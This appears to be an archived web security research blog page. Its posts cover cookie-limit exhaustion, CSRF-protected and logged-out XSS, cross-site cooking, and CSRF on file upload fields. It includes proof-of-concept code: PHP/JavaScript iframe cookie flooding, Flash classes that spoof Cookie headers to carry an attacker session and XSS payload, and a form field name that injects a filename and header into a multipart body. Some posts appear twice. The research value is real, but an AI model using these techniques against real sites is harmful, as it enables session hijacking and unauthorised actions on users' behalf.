If we assume that we will have the user browsing both a site which degrades to cookie-less auth and our malicious site at the same time then if you think about this then you can see that there is a race condition between when the server sets the cookie and the user logs in (and in some applications between when a page is served and the next html request is made).
The question is; can we win this race?
In Firefox, it takes approximately 100 miliseconds on my machine to set 1000 cookies over 20 hostnames, with 1 hostname per iframe. So we can win any race.
In my testing Opera is much faster at navigating between pages and setting cookies, however I'm still unsure if we can win this race in Opera.
I think the code at the end of this post can be improved by having the iframes on hostnames which looks like a.b.c.d....z.123.ccTLD and are 256 characters long and is made up of 126 levels of hostnames, where the first 125 levels are single character portions, so as to maximise the number of levels on the hostname.
And then in each iframe we would set the max number of cookies for .a.b.c.d....z.123.ccTLD then .b.c.d....z.123.ccTLD and then .c.d....z.123.ccTLD etc, until we set a cookie for 123.ccTLD - this would mean we do not havew to navigate between pages at all, and we could do opera's 65536 max cookie limit in 18 iframes; however before doing this we might have to force a lookup to all 2815 hostnames so that we don't hit a bottleneck in Opera's cross-site cooking code.
However, if we cannot get things as fast as in Firefox, we may still be able to win some races.
A lot depends on the application, but the easiest case is where we only have to win one race, and we can keep racing, such as the Phorum software which runs sla.ckers.org; it sets a temporary cookie which it checks the existence of when you login, and if it is not there when you login, it uses cookie-less auth for the whole session.
So our race here is against how long it takes the user to fill in the login page; and considering that if we lose the race we end up deleting all the cookies, we simply race again and again.
vBulletin on the other hand, is a much tougher beast. It tries to set a cookie on every page, even when you have begun using cookie-less auth, and also has a redirect page which redirects you in 2 seconds.
So not only do we have to win every race until a user views our image, we also have to be able to beat a two second race.
We can probably stop the redirect happening by simply running our code (which lags the system a bit), and winning the race like that, but winning the race 100% of the time may still be difficult, and would lag the system enough for the user to think of closing the tab/window.
However, when we race we race against everything, so the code we use is identical between applications, and would only have to change between browsers.
Anyway, here's some code for Firefox which spins when it doesn't need to be racing, i.e. when it has completely saturated the cookie jar and writing any additional cookie would simply overwrite earlier cookies that our script set, so that it only lags the system in bursts.
You need to have 20 subdomains setup which point to the second file; the easiest way to do this is just wildcard DNS. And have the first file setup on the parent domain, e.g. [1-20].localhost & localhost
main.php:
cookie_sub.php:
If you ever disable cookies and try to use the web you will notice that a surprising number of websites that use sessions still work, especially if they are using a session management framework or were written during the browser wars when a significant number of people still didn't have cookie support in their browser, or were suspicious enough to have them disabled.
All of the cookie-less authentication systems rely on the same idea: passing session tokens through the URL. Other than being bad practice because it gets logged, etc, FUD, etc, they also get leaked through referers to 3rd parties. So if we can get an persistent image pointing to our server, then we will have the session tokens leaked to us. And it does have to be persistent, because unlike cookies, session tokens passed in the URL are not implicit and are not attached to our reflected html injections.
However this is usually never raised as an issue because everyone has cookies enabled these days, and this attack doesn't work against anyone.
However, how do web applications which need to work without JavaScript detect if a user's browsers supports cookies? They simply set a cookie, and then when the user logs in they verify whether a cookie was sent, and if it was not they then start putting the session id in all the links and forms on a page. Some applications also check on every subsequent page if they can set a cookie, and if they can there is no way to degrade to cookie-less auth again.
As I wrote previously; I discovered that in Firefox and Opera we can exhaust the cookie limit to delete the user's old cookies.
If we assume that we will have the user browsing both a site which degrades to cookie-less auth and our malicious site at the same time then if you think about this then you can see that there is a race condition between when the server sets the cookie and the user logs in (and in some applications between when a page is served and the next html request is made).
The question is; can we win this race?
In Firefox, it takes approximately 100 miliseconds on my machine to set 1000 cookies over 20 hostnames, with 1 hostname per iframe. So we can win any race.
In my testing Opera is much faster at navigating between pages and setting cookies, however I'm still unsure if we can win this race in Opera.
I think the code at the end of this post can be improved by having the iframes on hostnames which looks like a.b.c.d....z.123.ccTLD and are 256 characters long and is made up of 126 levels of hostnames, where the first 125 levels are single character portions, so as to maximise the number of levels on the hostname.
And then in each iframe we would set the max number of cookies for .a.b.c.d....z.123.ccTLD then .b.c.d....z.123.ccTLD and then .c.d....z.123.ccTLD etc, until we set a cookie for 123.ccTLD - this would mean we do not havew to navigate between pages at all, and we could do opera's 65536 max cookie limit in 18 iframes; however before doing this we might have to force a lookup to all 2815 hostnames so that we don't hit a bottleneck in Opera's cross-site cooking code.
However, if we cannot get things as fast as in Firefox, we may still be able to win some races.
A lot depends on the application, but the easiest case is where we only have to win one race, and we can keep racing, such as the Phorum software which runs sla.ckers.org; it sets a temporary cookie which it checks the existence of when you login, and if it is not there when you login, it uses cookie-less auth for the whole session.
So our race here is against how long it takes the user to fill in the login page; and considering that if we lose the race we end up deleting all the cookies, we simply race again and again.
vBulletin on the other hand, is a much tougher beast. It tries to set a cookie on every page, even when you have begun using cookie-less auth, and also has a redirect page which redirects you in 2 seconds.
So not only do we have to win every race until a user views our image, we also have to be able to beat a two second race.
We can probably stop the redirect happening by simply running our code (which lags the system a bit), and winning the race like that, but winning the race 100% of the time may still be difficult, and would lag the system enough for the user to think of closing the tab/window.
However, when we race we race against everything, so the code we use is identical between applications, and would only have to change between browsers.
Anyway, here's some code for Firefox which spins when it doesn't need to be racing, i.e. when it has completely saturated the cookie jar and writing any additional cookie would simply overwrite earlier cookies that our script set, so that it only lags the system in bursts.
You need to have 20 subdomains setup which point to the second file; the easiest way to do this is just wildcard DNS. And have the first file setup on the parent domain, e.g. [1-20].localhost & localhost
main.php:
<html>
<body>
<script>
document.domain = document.domain;
var numloaded = 0;
var tries = 0;
function loaded() {
if (++numloaded == 20) {
go();
}
}
var numnotified = 0;
function notify() {
if (++numnotified == 20) {
numnotified = 0;
window.setTimeout ('poll()', 300);
}
}
var time = new Date();
function go() {
numnotified = 0;
document.cookie = 'testing=1';
for (var n=0;n<20;n++) {
window.frames[n].go();
}
}
function poll() {
var missing = 0;
for (var n=0;n<20;n++) {
missing = missing + window.frames[n].poll();
}
if (missing>0) {
go();
} else {
window.setTimeout ('poll()', 300);
}
}
</script>
<?php
for ($i=0;$i<20;$i++) {
print '<iframe src="http://'.($i+1).'.localhost/cookie_sub.php" style="visibility: hidden" width="1" height="1"></iframe>';
}
?>
</body>
</html>
cookie_sub.php:
<?php
header ("Expires: Fri, 17 Dec 2010 10:00:00 GMT"); //To speed up repeated attacks
?>
<html>
<body>
<script>
document.domain = 'localhost';
window.parent.loaded();
function go() {
for (var n=0;n<50;n++) {
document.cookie = n+"=1";
}
window.parent.notify();
}
function poll () {
if (document.cookie.split('; ').length==50) {
return 0;
} else {
return 1;
}
}
</script>
</body>
</html>
Exploiting CSRF Protected XSS
XSS vulnerabilities which are protected by CSRF protections, are usually considered unexploitable due to the fact that we have no way of predicting the CSRF token.
However, these protections do nothing more than check that the user is first "logged in" and that the CSRF token they sent is tied to their session; nowhere in this chain of events is there a condition which states that an attacker must be forcing the victim to use their own session identifier (cookie).
If we are able to force the victim to send a request which contains the attacker's cookie, CSRF token and XSS payload, then we will pass the CSRF protection checks and have script execution.
So how would we go about this? As I mentioned in my "Exploiting Logged Out XSS Vulnerabilities" post, Flash (until 9,0,115,0 and not in IE) allows us to spoof the Cookie header for a single request, however this suffers from the same problem that we cannot completely over-write cookies; only add an additional Cookie header.
This is indeed a possible attack vector though; if we first make sure the user is "logged out" (and also has no value for the login cookie) either by simply waiting, using a CSRF attack to log the user out (and hoping the website also clears it's cookies), or exhausting the browser's cookie limit, we can then add our own Cookie, CSRF token and XSS payload to the request using similar Flash code e.g.
Then the application will receive a request with our (the attacker's) session id, a valid CSRF token and our XSS payload from the victim's browser.
Of course, the problem with this is that if the user is actually logged out (which we forced, due to our inability to simply over-write the cookie or stop it being sent) and the browser no longer has the victim's cookies, the only attacks we have from this point are the other attacks mentioned in my "Exploiting Logged Out XSS Vulnerabilities" post. And while this is not ideal, it does at least give us something other than an unexploitable XSS.
Again, with this technique we can also set a cookie for the specific path, either by having an XSS on a related subdomain or by abusing a cros-site cooking bug, and then the user will still have their original cookie intact and we can simply remove our own cookie from the user's browser once our XSS has fired.
Another case where the user would be logged out is the case where we can somehow get the cookies stripped from the user's request.
The technique I presented at 24c3 talked about abusing one such piece of software which stripped cookies; the RequestRodeo Firefox extension which was created by Martin Johns and Justus Winter which does a good job of protecting against a lot of CSRF attacks by stripping cookies from requests originating from 3rd party sites (i.e. a request going to site.com which was induced by evil.com will not have any cookies attached to it). Which is just what we need.
Of course, this is a nice place to note that this is of course a niche piece of software that doesn't really provide a valid avenue for exploitation in almost any scenario, but as I explained in my post "Understanding Cookie Security" we can also delete all a users' cookies by exhausting the browser's global limit on on the amount of cookies it will store.
Anyway, given that RequestRodeo all cookies (including the ones we are attempting to send via Flash), we still face the problem that we need to be sending a valid session identifier for which we need to be sending a valid CSRF token. We do not face this problem when we remove the user's cookies, and can use the Flash approach outlined above, but we can also use this approach, which has the added benifit of still working on everyone (not just those who are unpatched).
Anyway, one interesting feature of PHP and other frameworks is that they accept session identifiers through the URL. This has of course led to easily exploitable Session Fixation attacks; however in PHP at least, if a cookie is being sent, then the value in the URL is completely ignored.
In our case, no cookie is being sent, since it is either being stripped by RequestRodeo, or has been deleted by us, so we can simply supply our session identifier through the URL, attach our CSRF token and XSS payload and we're done, except in this case the browser still has the user's cookies, and our XSS functions like normal.
The result of this attack is the same as the above if we have deleted the cookies from the user's browser, however if we have stripped the cookies with RequestRodeo or some similar tool/technique/etc, then we have the further benifit of the user still being logged in when our XSS fires.
As I wrote in my post "Understanding Cookie Security", if we have an XSS which is largely unexploitable (except via pure Session Fixation) since it is on a subdomain with no accounts, we can use it to set almost arbitrary cookies for other subdomains.
This gives us a perfect avenue, since we can set the path to only over-write cookies for our single CSRF Protected XSS page, and send the appropriate CSRF token and XSS payload for.
One case which is much simpler to exploit than the general case though, is where there are CSRF protections on the form where you submit the actual XSS, but the XSS is a persistent XSS for the user, in that it is rendered on another page (which is itself not CSRF protected, since it is used to display rather than edit data)
CAPTCHAs are not designed to be CSRF protections, and in certain cases are bypassable.
There are essentially two (not completely broken) types of CAPTCHA systems I have seen in widespread use, one where the plaintext is simply stored in the server-side session and the captcha is included in a form like this:
The other is when a form has a hidden input tag which contains a value which is also inside the image URL, like so:
The first system is trivially bypassed for CSRF & CSRF Protected XSS attacks by simply inserting the CAPTCHA onto a page, or inside an iframe (to strip/spoof referers), and asking the user to solve it.
The second can often be trivially bypassed for CSRF & CSRF Protected XSS attacks since the id is usually not user-dependant and the CAPTCHA does not keep track of what id it sent the user. Therefore the attacker can simply retrieve the appropriate CAPTCHA, solve it, and put the answer along with the corresponding captcha id in the csrf or csrf protected xss attack.
So essentially if we can somehow trick the application into using an attacker's session identifier, either by altering the cookie (e.g. via subdomain tricks, Flash, injecting into Set-Cookie headers, or whatever other trick we can come up with), or by suppressing or deleting the cookie and passing the identifier through another means such as the URL, then all CSRF protected XSSs are exploitable.
However if we cannot, then we can still exploit some scenarios such as self-only CSRF protected persistent XSS if the logout/login functionality is not CSRF-protected (which very few are). And we can also bypass the semi-CSRF protection of CAPTCHAs in several cases.
However, these protections do nothing more than check that the user is first "logged in" and that the CSRF token they sent is tied to their session; nowhere in this chain of events is there a condition which states that an attacker must be forcing the victim to use their own session identifier (cookie).
If we are able to force the victim to send a request which contains the attacker's cookie, CSRF token and XSS payload, then we will pass the CSRF protection checks and have script execution.
A General Case
So how would we go about this? As I mentioned in my "Exploiting Logged Out XSS Vulnerabilities" post, Flash (until 9,0,115,0 and not in IE) allows us to spoof the Cookie header for a single request, however this suffers from the same problem that we cannot completely over-write cookies; only add an additional Cookie header.
This is indeed a possible attack vector though; if we first make sure the user is "logged out" (and also has no value for the login cookie) either by simply waiting, using a CSRF attack to log the user out (and hoping the website also clears it's cookies), or exhausting the browser's cookie limit, we can then add our own Cookie, CSRF token and XSS payload to the request using similar Flash code e.g.
class Attack {
static function main(mc) {
var req:LoadVars = new LoadVars();
req.addRequestHeader("Cookie", "PHPSESSID=our_valid_session_id");
req.x = "y";
req.send("http://site.com/page.php?csrf_token=our_csrf_token&variable=",
"_self", "POST");
// Note: The method must be POST, and must contain
// POST data, otherwise headers don't get attached
}
}
Then the application will receive a request with our (the attacker's) session id, a valid CSRF token and our XSS payload from the victim's browser.
Of course, the problem with this is that if the user is actually logged out (which we forced, due to our inability to simply over-write the cookie or stop it being sent) and the browser no longer has the victim's cookies, the only attacks we have from this point are the other attacks mentioned in my "Exploiting Logged Out XSS Vulnerabilities" post. And while this is not ideal, it does at least give us something other than an unexploitable XSS.
Cookie tricks
Again, with this technique we can also set a cookie for the specific path, either by having an XSS on a related subdomain or by abusing a cros-site cooking bug, and then the user will still have their original cookie intact and we can simply remove our own cookie from the user's browser once our XSS has fired.
Abusing RequestRodeo
Another case where the user would be logged out is the case where we can somehow get the cookies stripped from the user's request.
The technique I presented at 24c3 talked about abusing one such piece of software which stripped cookies; the RequestRodeo Firefox extension which was created by Martin Johns and Justus Winter which does a good job of protecting against a lot of CSRF attacks by stripping cookies from requests originating from 3rd party sites (i.e. a request going to site.com which was induced by evil.com will not have any cookies attached to it). Which is just what we need.
Of course, this is a nice place to note that this is of course a niche piece of software that doesn't really provide a valid avenue for exploitation in almost any scenario, but as I explained in my post "Understanding Cookie Security" we can also delete all a users' cookies by exhausting the browser's global limit on on the amount of cookies it will store.
Anyway, given that RequestRodeo all cookies (including the ones we are attempting to send via Flash), we still face the problem that we need to be sending a valid session identifier for which we need to be sending a valid CSRF token. We do not face this problem when we remove the user's cookies, and can use the Flash approach outlined above, but we can also use this approach, which has the added benifit of still working on everyone (not just those who are unpatched).
Anyway, one interesting feature of PHP and other frameworks is that they accept session identifiers through the URL. This has of course led to easily exploitable Session Fixation attacks; however in PHP at least, if a cookie is being sent, then the value in the URL is completely ignored.
In our case, no cookie is being sent, since it is either being stripped by RequestRodeo, or has been deleted by us, so we can simply supply our session identifier through the URL, attach our CSRF token and XSS payload and we're done, except in this case the browser still has the user's cookies, and our XSS functions like normal.
The result of this attack is the same as the above if we have deleted the cookies from the user's browser, however if we have stripped the cookies with RequestRodeo or some similar tool/technique/etc, then we have the further benifit of the user still being logged in when our XSS fires.
Other Cookie Tricks
As I wrote in my post "Understanding Cookie Security", if we have an XSS which is largely unexploitable (except via pure Session Fixation) since it is on a subdomain with no accounts, we can use it to set almost arbitrary cookies for other subdomains.
This gives us a perfect avenue, since we can set the path to only over-write cookies for our single CSRF Protected XSS page, and send the appropriate CSRF token and XSS payload for.
Self-Only CSRF Protected Persistent XSS
One case which is much simpler to exploit than the general case though, is where there are CSRF protections on the form where you submit the actual XSS, but the XSS is a persistent XSS for the user, in that it is rendered on another page (which is itself not CSRF protected, since it is used to display rather than edit data)
CAPTCHAs As CSRF Protections
CAPTCHAs are not designed to be CSRF protections, and in certain cases are bypassable.
There are essentially two (not completely broken) types of CAPTCHA systems I have seen in widespread use, one where the plaintext is simply stored in the server-side session and the captcha is included in a form like this:
<img src="captcha.php" />
The other is when a form has a hidden input tag which contains a value which is also inside the image URL, like so:
<input type="hidden" name="captcha_id" value="1234567890" />
<img src="captcha.php?id=1234567890" />
The first system is trivially bypassed for CSRF & CSRF Protected XSS attacks by simply inserting the CAPTCHA onto a page, or inside an iframe (to strip/spoof referers), and asking the user to solve it.
The second can often be trivially bypassed for CSRF & CSRF Protected XSS attacks since the id is usually not user-dependant and the CAPTCHA does not keep track of what id it sent the user. Therefore the attacker can simply retrieve the appropriate CAPTCHA, solve it, and put the answer along with the corresponding captcha id in the csrf or csrf protected xss attack.
Conclusion
So essentially if we can somehow trick the application into using an attacker's session identifier, either by altering the cookie (e.g. via subdomain tricks, Flash, injecting into Set-Cookie headers, or whatever other trick we can come up with), or by suppressing or deleting the cookie and passing the identifier through another means such as the URL, then all CSRF protected XSSs are exploitable.
However if we cannot, then we can still exploit some scenarios such as self-only CSRF protected persistent XSS if the logout/login functionality is not CSRF-protected (which very few are). And we can also bypass the semi-CSRF protection of CAPTCHAs in several cases.
Labels:
CSRF,
HTTP,
Security (All),
Web App Sec,
XSS
Exploiting Logged Out XSS Vulnerabilities
Usually when we consider vulnerabilities which are only rendered when a user is logged out (e.g. a side bar which renders a vulnerable login form when logged out, and a menu otherwise), the known methods of attack lie in, first getting the user logged out, and then doing one of the following:
Some new possibilities for attacking these vulnerabilities are:
Most browsers do not let you read pages which have not been explicitly cached, and where the Expires or Cache-Control headers have not been set, except Internet Explorer.
If you use the XmlHttpRequest object to make a request to a resource which has no caching information attached to it you will simply get back the cached copy which may contain sensitive information such as the person's billing details, or other juicy information you an use in other exploits.
But since security people have been parroting on about how websites need to make sure that they don't let the browser cache something because the user may be using a public computer, etc, etc, this is much less viable, however at least we now have a real reason for recommending people to not let the browser cache things.
However before we jump to the conclusion that the vulnerability is only triggered when the user is logged out let us consider what it really means to be "logged in".
To be "logged in" is to send the web application a cookie header which gets parsed by the server/web application framework (e.g. Apache/PHP), and the parsed value is associated by the application with a valid session.
So conversely, when are you "logged out"? You're logged out whenever the above series of events (plus any other steps I missed) don't fall exactly into place.
So if we start with a user who is currently logged in; instead of logging them out completely via CSRF (or just waiting until they log themselves out), the trick here is to create an exploit which fires when the browser still holds the users cookies, but the application doesn't receive those cookies exactly.
The easiest and most generic place (I found) to attack this chain is to alter what the browser sends, and therefore the server receives.
Until the latest version of Flash (which is 9,0,115,0), the following code ran properly and let us tamper with the Cookie header:
Unfortunately this does not work in IE, since IE seems to stop plugins from playing with the Cookie headers it sends.
Furthermore, this does not actually replace the Cookie header which the browser sends, rather it forces the browser to send an additional Cookie header which would make the relevant part of the HTTP request look something like to this:
Which PHP (and pretty much every other Server/web application framework) would reconcile into the single PHPSESSID value of:
Which is of course not a valid session token, and the application treats the user as logged out, and our XSS executes as if the user was logged out, however since the browser still has all the cookies, so we can either steal them or get the user to perform actions on our behalf, etc.
The less generic, but still working approach is to overwrite overwrite the cookies for your particular path only, either via an XSS from a related subdomain or by abusing a cross-site cookie bug in a browser (check my last post).
- Extracting login information from the Password Manager
- Modifying a client-side data store, such as cookies or Flash LSO's to create an attack which fires later when a user is logged in
- Conducting a Session Fixation attack
Some new possibilities for attacking these vulnerabilities are:
- Reading the Browser Cache via XSS
- Semi-Logging the User Out
Reading the Browser Cache via XSS
Most browsers do not let you read pages which have not been explicitly cached, and where the Expires or Cache-Control headers have not been set, except Internet Explorer.
If you use the XmlHttpRequest object to make a request to a resource which has no caching information attached to it you will simply get back the cached copy which may contain sensitive information such as the person's billing details, or other juicy information you an use in other exploits.
But since security people have been parroting on about how websites need to make sure that they don't let the browser cache something because the user may be using a public computer, etc, etc, this is much less viable, however at least we now have a real reason for recommending people to not let the browser cache things.
Semi-Logging the User Out
However before we jump to the conclusion that the vulnerability is only triggered when the user is logged out let us consider what it really means to be "logged in".
To be "logged in" is to send the web application a cookie header which gets parsed by the server/web application framework (e.g. Apache/PHP), and the parsed value is associated by the application with a valid session.
So conversely, when are you "logged out"? You're logged out whenever the above series of events (plus any other steps I missed) don't fall exactly into place.
So if we start with a user who is currently logged in; instead of logging them out completely via CSRF (or just waiting until they log themselves out), the trick here is to create an exploit which fires when the browser still holds the users cookies, but the application doesn't receive those cookies exactly.
The easiest and most generic place (I found) to attack this chain is to alter what the browser sends, and therefore the server receives.
Until the latest version of Flash (which is 9,0,115,0), the following code ran properly and let us tamper with the Cookie header:
class Attack {
static function main(mc) {
var req:LoadVars = new LoadVars();
req.addRequestHeader("Cookie", "PHPSESSID=junk");
req.x = "y";
req.send("http://site.com/page.php?variable=",
"_self", "POST");
// Note: The method must be POST, and must contain
// POST data, otherwise headers don't get attached
}
}
Unfortunately this does not work in IE, since IE seems to stop plugins from playing with the Cookie headers it sends.
Furthermore, this does not actually replace the Cookie header which the browser sends, rather it forces the browser to send an additional Cookie header which would make the relevant part of the HTTP request look something like to this:
Cookie: PHPSESSID=valid_id
Cookie: PHPSESSID=junk
Which PHP (and pretty much every other Server/web application framework) would reconcile into the single PHPSESSID value of:
valid_id, PHPSESSID=junk
Which is of course not a valid session token, and the application treats the user as logged out, and our XSS executes as if the user was logged out, however since the browser still has all the cookies, so we can either steal them or get the user to perform actions on our behalf, etc.
The less generic, but still working approach is to overwrite overwrite the cookies for your particular path only, either via an XSS from a related subdomain or by abusing a cross-site cookie bug in a browser (check my last post).
Labels:
HTTP,
Javascript,
Security (All),
Web App Sec,
XSS
Understanding Cookie Security
Whenever anyone decides to talk about XSS, one thing which is sure to pop up is the Same Origin Policy which XSS avoids by being reflected by the server. The Same Origin Policy is the security restriction which make sure that any pages trying to communicate via JavaScript are on the same protocol, domain and port. However this is misleading since it is not the weakest link that browsers have between domains.
The weakest link across domains is (for lack of a better term) the cookie policy which determines which domains can set cookies for which domains and which cookies each domain receives.
The cookies we use have several fields, including these ones I want to talk about:
First, it must be noticed that the protocol restriction which is explicit in the Same Origin policy is here implicit, since cookies are an extension to HTTP, and so would only be sent for http, however the distinction between http and https is only enforced if the Secure flag is set.
Secondly, unlike the same origin policy, the cookie policy has no restrictions on ports, explicit or implicit.
And furthermore the domain check is not exact. From RFC 2109:
Effectively, this means that that any subdomains of a given domain can set, and is sent the cookies for that domain, i.e. news.google.com can set, and is sent the cookies for .google.com. Furthermore a second subdomain, e.g. mail.google.com can also set, and is sent the cookies for .google.com - This effectively means that by setting a cookie for google.com, news.google.com can force the user's browser to send a cookie to mail.google.com.
But what if two cookies of the same name should be sent to a given page, e.g. if there is a cookie called "user" set for mail.google.com and .google.com with different values, how does the browser decide which one to send?
RFC 2109 states that the cookie with the more specific path attribute must be sent first, however it does not define how to deal with two cookies which have the same path (e.g. /) but different domains. If such a conflict occurs then most (all?) browsers simply send the older cookie first.
This means that if we want to overwrite a cookie on mail.google.com from the subdomain news.google.com, and the cookie already exists, then we cannot over-write a cookie with the path value of / (or whatever the path value of the existing cookie is), but we can override it for every other path (up to the maximum number of cookies allowed per host; 50 in IE/Firefox 30 in Opera), i.e. if we pick 50 (or 30 if we want to target opera) paths on mail.google.com which encompass the directories and pages we want to overwrite the cookie for, we can simply set 50 /30 separate cookies which are all more specific than the existing cookie.
Technically the spec say that a.b.c.d cannot set a cookie for a.b.c.d or b.c.d only, none of the browsers enforce this since it breaks sites. Also, sites should not be able to set a cookie with a path attribute which would not apply to the current page, but since path boundaries are non-existant in browsers, no-one enforces this restriction either.
When you think about the problem in the above scenario, you end up asking; can I use the same technique to send a cookie from news.com to mail.com? Or some similar scenario where you are going from one privately owned domain to another in a public registry. The RFC spec did foresee this to some degree and came up with the "one dot rule", i.e. that you can't set a cookie for a domain which does not have an embedded dot, e.g. you cannot set a cookie for .com or .net, etc.
What the spec did not foresee is the creation of public registries such as co.uk which do contain an embedded dot. And this is where the fun begins, since there is no easy solution for this, and the RFC has no standard solution, all the browsers pretty much did their own thing.
IE has the least interesting and most restrictive system; you cannot set a cookie for a two letter domain of the form ab.xy or (com|net|org|gov|edu).xy. Supposedly there is a key in the registry at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\SpecialDomains which will let you whitelist a domain to allow ab.xy to be set and my registry has the value "lp. rg." for that key, but I haven't been able to set a cookie for ab.pl or ab.rg so go figure.
Opera on the other hand has perhaps the most interesting system of all the browser vendors. Opera does a DNS lookup on the domain you are trying to set a cookie for, and if it finds an A record (i.e. the domain has an IP address associated with it) then you can set a cookie for it. So if ab.xy resolves to an IP then you can set a cookie for it, however this breaks if the TLD resolves, as is the case for co.tv
Firefox 2 seems to have no protections. I was unable to find any protections in the source and was able to get foobar.co.uk to set cookies for .co.uk, so ummm, why does no-one ever mention this? I have no clue....
Firefox 3 on the other hand has a huge list of all the domains for which you cannot set cookies, which you can view online here. Hurray for blacklists.....
Another interesting aspect of cookies is that there is a limit on how many cookies can be stored, not only per host, but in total, at least in Firefox and Opera. IE doesn't seem to have such a restriction.
In Firefox the global limit is 1000 cookies with 50 per host (1.evil.com and 2.evil.com are different hosts), and on Opera it is 65536 cookies with 30 per host. IE does not seem to have a global limit but does have a host limit of 50 cookies. When you reach the global limit, both browsers go with the RFC recommendation and start deleting cookies.
Both Firefox and Opera simply choose to delete the oldest cookies, and so by setting either 1000 or 65536 cookies depending on the browser, you effectively clear the user's cookie of anything another domain has set.
By either setting the path attribute to point to more specific pages we can effectively overwrite cookies from other domains that we can set cookies for, which includes all the co.xy domains. Also, if we are attacking Firefox or Opera we can simply delete the existing cookies if we need to force our cookie to be sent to a path for which a cookie is already set (e.g. /).
You may also be able to induce some weird states, if you somehow manage to only delete one cookie where an applicaiton expects two, or similar, but I doubt that would be very exploitable.
The weakest link across domains is (for lack of a better term) the cookie policy which determines which domains can set cookies for which domains and which cookies each domain receives.
What's in a cookie
The cookies we use have several fields, including these ones I want to talk about:
- Name
- Value
- Domain
- Path
- Expires
First, it must be noticed that the protocol restriction which is explicit in the Same Origin policy is here implicit, since cookies are an extension to HTTP, and so would only be sent for http, however the distinction between http and https is only enforced if the Secure flag is set.
Secondly, unlike the same origin policy, the cookie policy has no restrictions on ports, explicit or implicit.
And furthermore the domain check is not exact. From RFC 2109:
Hosts names can be specified either as an IP address or a FQHN
string. Sometimes we compare one host name with another. Host A's
name domain-matches host B's if
* both host names are IP addresses and their host name strings match
exactly; or
* both host names are FQDN strings and their host name strings match
exactly; or
* A is a FQDN string and has the form NB, where N is a non-empty name
string, B has the form .B', and B' is a FQDN string. (So, x.y.com
domain-matches .y.com but not y.com.)
Note that domain-match is not a commutative operation: a.b.c.com
domain-matches .c.com, but not the reverse.
Effectively, this means that that any subdomains of a given domain can set, and is sent the cookies for that domain, i.e. news.google.com can set, and is sent the cookies for .google.com. Furthermore a second subdomain, e.g. mail.google.com can also set, and is sent the cookies for .google.com - This effectively means that by setting a cookie for google.com, news.google.com can force the user's browser to send a cookie to mail.google.com.
Resolving Conflicts
But what if two cookies of the same name should be sent to a given page, e.g. if there is a cookie called "user" set for mail.google.com and .google.com with different values, how does the browser decide which one to send?
RFC 2109 states that the cookie with the more specific path attribute must be sent first, however it does not define how to deal with two cookies which have the same path (e.g. /) but different domains. If such a conflict occurs then most (all?) browsers simply send the older cookie first.
This means that if we want to overwrite a cookie on mail.google.com from the subdomain news.google.com, and the cookie already exists, then we cannot over-write a cookie with the path value of / (or whatever the path value of the existing cookie is), but we can override it for every other path (up to the maximum number of cookies allowed per host; 50 in IE/Firefox 30 in Opera), i.e. if we pick 50 (or 30 if we want to target opera) paths on mail.google.com which encompass the directories and pages we want to overwrite the cookie for, we can simply set 50 /30 separate cookies which are all more specific than the existing cookie.
Technically the spec say that a.b.c.d cannot set a cookie for a.b.c.d or b.c.d only, none of the browsers enforce this since it breaks sites. Also, sites should not be able to set a cookie with a path attribute which would not apply to the current page, but since path boundaries are non-existant in browsers, no-one enforces this restriction either.
Cross-Site Cooking
When you think about the problem in the above scenario, you end up asking; can I use the same technique to send a cookie from news.com to mail.com? Or some similar scenario where you are going from one privately owned domain to another in a public registry. The RFC spec did foresee this to some degree and came up with the "one dot rule", i.e. that you can't set a cookie for a domain which does not have an embedded dot, e.g. you cannot set a cookie for .com or .net, etc.
What the spec did not foresee is the creation of public registries such as co.uk which do contain an embedded dot. And this is where the fun begins, since there is no easy solution for this, and the RFC has no standard solution, all the browsers pretty much did their own thing.
IE has the least interesting and most restrictive system; you cannot set a cookie for a two letter domain of the form ab.xy or (com|net|org|gov|edu).xy. Supposedly there is a key in the registry at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\SpecialDomains which will let you whitelist a domain to allow ab.xy to be set and my registry has the value "lp. rg." for that key, but I haven't been able to set a cookie for ab.pl or ab.rg so go figure.
Opera on the other hand has perhaps the most interesting system of all the browser vendors. Opera does a DNS lookup on the domain you are trying to set a cookie for, and if it finds an A record (i.e. the domain has an IP address associated with it) then you can set a cookie for it. So if ab.xy resolves to an IP then you can set a cookie for it, however this breaks if the TLD resolves, as is the case for co.tv
Firefox 2 seems to have no protections. I was unable to find any protections in the source and was able to get foobar.co.uk to set cookies for .co.uk, so ummm, why does no-one ever mention this? I have no clue....
Firefox 3 on the other hand has a huge list of all the domains for which you cannot set cookies, which you can view online here. Hurray for blacklists.....
Exhausting Cookie Limits
Another interesting aspect of cookies is that there is a limit on how many cookies can be stored, not only per host, but in total, at least in Firefox and Opera. IE doesn't seem to have such a restriction.
In Firefox the global limit is 1000 cookies with 50 per host (1.evil.com and 2.evil.com are different hosts), and on Opera it is 65536 cookies with 30 per host. IE does not seem to have a global limit but does have a host limit of 50 cookies. When you reach the global limit, both browsers go with the RFC recommendation and start deleting cookies.
Both Firefox and Opera simply choose to delete the oldest cookies, and so by setting either 1000 or 65536 cookies depending on the browser, you effectively clear the user's cookie of anything another domain has set.
Conclusion
By either setting the path attribute to point to more specific pages we can effectively overwrite cookies from other domains that we can set cookies for, which includes all the co.xy domains. Also, if we are attacking Firefox or Opera we can simply delete the existing cookies if we need to force our cookie to be sent to a path for which a cookie is already set (e.g. /).
You may also be able to induce some weird states, if you somehow manage to only delete one cookie where an applicaiton expects two, or similar, but I doubt that would be very exploitable.
CSRF-ing File Upload Fields
It seems I'm destined to have everything I sit on for a while patched or found and disclosed by someone else, *sigh*, I guess that's the way things go though.
Oh well, pdp has an interesting post over at gnucitizen.org about how to perform CSRF attacks against File upload fields using Flash: http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
Since there would be no point publishing this later, here is the method I came up with a while ago to CSRF File upload fields
It relies on a bug in Firefox/IE/Safari where the filenames are not escaped before being put into the POST body to set the filename parameter and content-type header.
Note: http://kuza55.awardspace.com/files.php is probably vulnerable to a tonne of things; I'm not too worried as it's on free hosting.
Oh well, pdp has an interesting post over at gnucitizen.org about how to perform CSRF attacks against File upload fields using Flash: http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
Since there would be no point publishing this later, here is the method I came up with a while ago to CSRF File upload fields
<form method="post" action="http://kuza55.awardspace.com/files.php" enctype="multipart/form-data">
<textarea name='file"; filename="filename.ext
Content-Type: text/plain; '>Arbitrary File
Contents</textarea>
